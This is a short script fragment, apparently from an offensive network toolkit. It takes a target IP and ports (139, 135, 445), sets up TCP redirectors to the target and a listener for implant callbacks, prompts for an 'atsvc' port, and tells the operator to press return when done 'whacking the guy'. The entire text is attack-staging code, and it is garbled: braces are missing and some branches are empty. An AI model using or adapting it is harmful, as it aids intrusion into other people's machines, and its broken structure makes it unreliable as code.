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if ($argc < 2) {
echo "Usage: $argv[0] <targetIP> <targetPort> <callbackPort>\r\n";
return false;
string $target= $argv[1];
string $targetPort="139";
string $callbackPort="1330";
if ($argc >= 3) {
if ($argc >= 4) {
string $localPort="1390";
if ($targetPort == "135") {
} else if ($targetPort == "445") {
@echo off;
ifnot (`redirect ?`) {
echo "*** Redirect command not found...unable to complete script ***";
return false;
@echo on;
@echo on;
ifnot (`background redirect -tcp -lplisten $localPort -target $target $targetPort`) {
return false;
ifnot (`background redirect -tcp -nodes 40 -implantlisten $callbackPort -target $callbackPort`) {
return false;
string $atsvcPort=GetInput("What is the atsvc port?");
ifnot (`background redirect -tcp -lplisten 1350 -target $target $targetPort`) {
return false;
echo "Hit return when you're done whacking the guy.\n";
`stop redirect -contains "tcp -lplisten $localPort -target $target $targetPort"`;
`stop redirect -contains "tcp -lplisten 1350 -target $target $targetPort"`;
echo "All redirectors have been started";
return true;